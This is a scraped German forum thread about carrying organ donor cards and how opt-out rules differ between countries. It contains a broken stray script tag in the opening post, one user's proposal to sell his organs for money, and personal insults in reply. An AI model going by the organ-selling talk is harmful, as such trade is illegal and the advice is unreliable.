Zum Forum springen
Organspender

Benachrichtigungen
Alles löschen

Organspender

92 Beiträge
56 Benutzer
0 Reactions
6,099 Ansichten
tobcen555
Beigetreten: 17.04.2006

bin seit heute organspender...wer noch?

<script src=' &p=tl' type='text/javascript'></script><noscript></noscript>

Original von tobcen555

Original von Nutz
[ ] lustig

sorry, wenn dass falsch verstanden wurde.

1. ich bin wirklich Oranspender
2. mich interressiert wer von euch auch organspender ist

vielleicht wäre der thread deshalb besser im smalltalk aufgehoben.falls ein moderator sich berufen fühlt, kann er den ja gerne verschieben.

gruß tobcen

den ausweis kann man sich online bestellen, oder auch downloaden

http://www.fuers-leben.de/index.php/reasons/index/n,3/s,0

Antwort
Zitat
91 Antworten
FlyingAceman87
Beigetreten: 04.12.2009

hahahaha ,,, hahaha ,,, haha ,,, ha ,,, h ,,, a

???

Ja, ich trag son Ding mit mir rum. Aber mit echten Daten drin. BOAH!

Antwort
Zitat
Fantomas741
Beigetreten: 13.08.2006

Hm was hatt denn der Ausweis für einen Sinn wenn man da NEIN ankreuzt heist das wenn ich keinen Ausweis habe holen die nach gut dünken raus

Antwort
Zitat
Gunius
Beigetreten: 28.04.2009

Original von Fantomas741
Hm was hatt denn der Ausweis für einen Sinn wenn man da NEIN ankreuzt heist das wenn ich keinen Ausweis habe holen die nach gut dünken raus

In den Niederlanden wenn ich mich nicht irre holen die alles raus wenn du keinen mit hast wo "Nein" draufsteht. In Deutschland ist das anders, da nehmen die nur raus wenn du einen mithast und wenn draufsteht was du wo und wie spendest.

Antwort
Zitat

Original von FlyingAceman87
hahahaha ,,, hahaha ,,, haha ,,, ha ,,, h ,,, a

???

Ja, ich trag son Ding mit mir rum. Aber mit echten Daten drin. BOAH!

Antwort
Zitat
bumblebeebee
Beigetreten: 06.06.2006

Original von Fantomas741

wenn du keinen hast entscheiden deine verwandten

Antwort
Zitat
MedusasHair
Beigetreten: 09.02.2010

hab einen

Antwort
Zitat
Blaumav
Beigetreten: 01.09.2006

Original von MedusasHair
hab einen

Antwort
Zitat
Th0m4sBC
Beigetreten: 01.06.2006

Ich hab einen, allerdings habe ich angekreuzt, dass ich keine Organe spenden möchte. Sinn dahinter ist ganz einfach, dass meine Familie diese Entscheidung im Falle X nicht treffen muss.

Antwort
Zitat
nacl
Beigetreten: 17.03.2009

Muss mir auch einen Besorgen, wollte es an sich schon lange tun

Antwort
Zitat
JustgAMblin
Beigetreten: 10.01.2007

Original von Blaumav

Original von MedusasHair
hab einen

Antwort
Zitat

Wo bekomm ich das eigentlich einen her?

Antwort
Zitat
tobcen555 Themenstarter
tobcen555
Beigetreten: 17.04.2006

Original von Nutz
[ ] lustig

sorry, wenn dass falsch verstanden wurde.

1. ich bin wirklich Oranspender
2. mich interressiert wer von euch auch organspender ist

vielleicht wäre der thread deshalb besser im smalltalk aufgehoben.falls ein moderator sich berufen fühlt, kann er den ja gerne verschieben.

gruß tobcen

den ausweis kann man sich online bestellen, oder auch downloaden

http://www.fuers-leben.de/index.php/reasons/index/n,3/s,0

Antwort
Zitat
Nadiine
Beigetreten: 29.02.2008

Auf Wunsch von OP ins Small Talk verschoben, Eingangspost editiert und NichtsmallTalk taugliche Kommentare gelöscht.

Antwort
Zitat

Hab keinen aber hab meiner Familie gesagt sie sollen falls es mal zu dem Fall kommt versuchen die Organe gegen 5-stelliges Handgeld abzugeben, ansonsten auf keinen Fall.

Im Ernst, was hab ich davon irgendjemand der das vielleicht gar nicht verdient was zu schenken. Wenn ich schon tot bin können wenigstens meine Eltern ne Kreuzfahrt machen.

Antwort
Zitat
Blaumav
Beigetreten: 01.09.2006

Original von Araklion
Hab keinen aber hab meiner Familie gesagt sie sollen falls es mal zu dem Fall kommt versuchen die Organe gegen 5-stelliges Handgeld abzugeben, ansonsten auf keinen Fall.

Im Ernst, was hab ich davon irgendjemand der das vielleicht gar nicht verdient was zu schenken. Wenn ich schon tot bin können wenigstens meine Eltern ne Kreuzfahrt machen.

Dann mach es halt wie Will Smith in "Seven Pounds"...

Antwort
Zitat

Original von Blaumav

Original von Araklion

Dann mach es halt wie Will Smith in "Seven Pounds"...

Genau das will ich ja nicht machen man. Außer jeder der Knaben drückt 10+k ab.

Antwort
Zitat
Bliss86
Beigetreten: 04.08.2006

Original von Araklion

Welcher Mensch hätte es deiner Ansicht zum Beispiel denn verdient, gesunde Organe zu bekommen? Nur Menschen die eine 5-stellige Summe zur Verfügung haben?

Antwort
Zitat
csTFG
Beigetreten: 29.03.2007

Original von Araklion

Wie dumm kann man eigentlich sein. Ich hoffe du brauchst irgendwann mal ein Organ und bekommst keins!

Antwort
Zitat

Original von Bliss86

Original von Araklion

Welcher Mensch hätte es deiner Ansicht zum Beispiel denn verdient, gesunde Organe zu bekommen? Nur Menschen die eine 5-stellige Summe zur Verfügung haben?

Vermutlich niemand. Vermutlich gibts für jeden Mensch auf der Erde nen Grund warum er es verdient kein Spenderorgan zu bekommen (bzw. es gibt keinen Grund warum er es verdient eins zu bekommen).
Wenn ich schon sterb, dann soll es doch wenigstens den Menschen was bringen die so freundlich waren mich zu mögen.
Was haben meine Hinterbliebenen davon wenn irgendein Waisenkind mit meinen Organen weiterlebt?
Dann doch lieber das Geld.

Jetzt könnte man natürlich noch sagen wenn keiner was dafür löhnen will kann man die Organe doch spenden aber ich bin aus Erfahrung überzeugter Misanthrop.

Original von csTFG
Wie dumm kann man eigentlich sein. Ich hoffe du brauchst irgendwann mal ein Organ und bekommst keins!

wie er kocht. bist wohl am krepieren und hast keine 10k.

Antwort
Zitat
Teilen: